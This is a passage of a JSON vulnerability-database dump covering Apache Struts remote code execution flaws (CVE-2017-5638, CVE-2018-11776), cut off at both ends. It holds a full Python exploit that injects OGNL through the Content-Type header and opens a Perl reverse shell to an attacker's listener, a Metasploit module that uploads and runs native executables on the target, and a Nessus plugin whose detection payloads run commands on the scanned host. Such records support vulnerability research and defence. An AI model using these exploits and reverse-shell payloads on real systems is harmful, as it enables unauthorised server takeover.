cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-20T03:15:54", "description": "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell.#### Usage Info\nTested with tomcat8\r Install tomcat8\r Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r Ex:\r Open: $ nc -lnvp 4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'", "cvss3": {}, "published": "2017-03-12T00:00:00", "type": "zdt", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-12T00:00:00", "id": "1337DAY-ID-27300", "href": "https://0day.today/exploit/description/27300", "sourceData": "# CVE-2017-5638\r\n# Apache Struts 2 Vulnerability Remote Code Execution\r\n# Reverse shell from target\r\n# Author: anarc0der - github.com/anarcoder\r\n# Tested with tomcat8\r\n\r\n# Install tomcat8\r\n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r\n\r\n# Ex:\r\n# Open: $ nc -lnvp 4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'\r\n\r\n\r\n\"\"\"\r\nUsage:\r\n struntsrce.py --target=<arg> --test\r\n struntsrce.py --target=<arg> --cmd=<arg>\r\n struntsrce.py --target=<arg> --ip=<arg> --port=<arg>\r\n struntsrce.py --help\r\n struntsrce.py --version\r\nOptions:\r\n -h --help Open help menu\r\n -v --version Show version\r\nRequired options:\r\n --target='url target' your target :)\r\n --test check if target is vulnerable or not\r\n --cmd='uname -a' your command to execute in target\r\n --ip='10.10.10.1' your ip\r\n --port=4444 open port for back connection\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport httplib\r\nimport os\r\nimport sys\r\nfrom docopt import docopt, DocoptExit\r\n\r\n\r\nclass CVE_2017_5638():\r\n\r\n def __init__(self, p_target):\r\n self.target = p_target\r\n # self.ip = p_ip\r\n # self.port = p_port\r\n # self.exploit()\r\n\r\n def generate_revshell(self, p_ip, p_port):\r\n revshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\\r\n \"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\\r\n \"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\\r\n \"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\\r\n \"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\"\r\n return revshell.format(p_ip, p_port)\r\n\r\n def generate_payload(self, p_cmd):\r\n payload = \"%{{(#_='multipart/form-data').\"\\\r\n \"(#[email\u00a0protected][email\u00a0protected]_MEMBER_ACCESS).\"\\\r\n \"(#_memberAccess?\"\\\r\n \"(#_memberAccess=#dm):\"\\\r\n \"((#container=#context['com.opensymphony.xwork2.\"\\\r\n \"ActionContext.container']).\"\\\r\n \"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\\r\n \"[email\u00a0protected])).\"\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\"\\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\"\\\r\n \"(#context.setMemberAccess(#dm)))).\"\\\r\n \"(#cmd='{0}').\"\\\r\n \"(#iswin=(@[email\u00a0protected]('os.name').\"\\\r\n \"toLowerCase().contains('win'))).\"\\\r\n \"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\\r\n \"{{'/bin/bash','-c',#cmd}})).\"\\\r\n \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\\r\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\\r\n \"(#ros=(@[email\u00a0protected]\"\\\r\n \"Response().getOutputStream())).\"\\\r\n \"(@[email\u00a0protected]\"\\\r\n \"(#process.getInputStream(),#ros)).(#ros.flush())}}\"\r\n return payload.format(p_cmd)\r\n\r\n def send_xpl(self, p_payload):\r\n body = ''\r\n try:\r\n # Set proxy for debug request, just uncomment these lines\r\n # Change the proxy port\r\n\r\n #proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'})\r\n #opener = urllib2.build_opener(proxy)\r\n #urllib2.install_opener(opener)\r\n\r\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)'\r\n ' AppleWebKit/537.36 (KHTML, like Gecko)'\r\n ' Chrome/55.0.2883.87 Safari/537.36',\r\n 'Content-Type': p_payload}\r\n xpl = urllib2.Request(self.target, headers=headers)\r\n body = urllib2.urlopen(xpl, timeout=5).read()\r\n except httplib.IncompleteRead as b:\r\n body = b.partial\r\n except:\r\n pass\r\n return body\r\n\r\n def os_detect(self):\r\n cmd = 'uname'\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n if 'Linux' in resp or 'Darwin' in resp:\r\n print '[+] Unix-like OS system detected.\\n'\r\n else:\r\n print '[+] Windows OS system detected.\\n'\r\n\r\n def test_vuln(self):\r\n cmd = 'hacked'\r\n print '\\n[+] Testing ' + self.target\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n tags = ['<html', '<head', '<body', '<script', '<div']\r\n if any(tag not in resp.lower() for tag in tags) and cmd in resp:\r\n print '[+] Target possibly vulnerable'\r\n print '[+] Finger printing OS system..'\r\n self.os_detect()\r\n else:\r\n print '[-] Target not vulnerable\\n'\r\n sys.exit(0)\r\n\r\n def exec_cmd(self, p_cmd):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Executing: {0}\\n\\n'.format(p_cmd)\r\n resp = self.send_xpl(self.generate_payload(p_cmd))\r\n print resp\r\n\r\n def exec_revshell(self, p_ip, p_port):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Dont forget to listen on port: {0}'.format(p_port)\r\n print '[+] Attempting reverse shell...\\n'\r\n\r\n self.send_xpl(self.generate_payload(\r\n self.generate_revshell(p_ip, p_port)))\r\n\r\n\r\ndef main():\r\n try:\r\n arguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\")\r\n target = arguments['--target']\r\n test = arguments['--test']\r\n cmd = arguments['--cmd']\r\n ip = arguments['--ip']\r\n port = arguments['--port']\r\n\r\n except DocoptExit as e:\r\n os.system('python2 struntsrce.py --help')\r\n sys.exit(1)\r\n\r\n x = CVE_2017_5638(target)\r\n if test:\r\n x.test_vuln()\r\n if cmd:\r\n x.exec_cmd(cmd)\r\n if ip and port:\r\n x.exec_revshell(ip, port)\r\n\r\n\r\nif __name__ == '__main__':\r\nmain()\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27300", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = send_request_cgi(\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def execute_command(cmd)\r\n ognl = ''\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n\r\n # You can add headers to the server's response for debugging with this:\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('decoded',#cmd)).|\r\n\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start())|\r\n\r\n send_struts_request(ognl, extra_header: cmd)\r\n end\r\n\r\n def send_payload(exe)\r\n\r\n ognl = \"\"\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{rand_text_alpha(4)}','.exe')).|\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|\r\n\r\n # Using stuff from the sun.* package here means it likely won't work on\r\n # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to\r\n # work and I don't see a better way of getting binary data onto the\r\n # system. =/\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|\r\n ognl << %q|(#fos.write(#d)).|\r\n ognl << %q|(#fos.close()).|\r\n\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete())|\r\n\r\n send_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\"))\r\n end\r\n\r\nend\r\n\r\n=begin\r\nDoesn't work:\r\n\r\n ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|\r\n ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|\r\n ognl << %q|(#[email\u00a0protected]@getMethods(#c,'main',true).get(0)).|\r\n ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|\r\n ognl << %q|(#m.invoke(null,null)).|\r\n\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n=end\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27316", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-23T14:14:27", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = \"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + 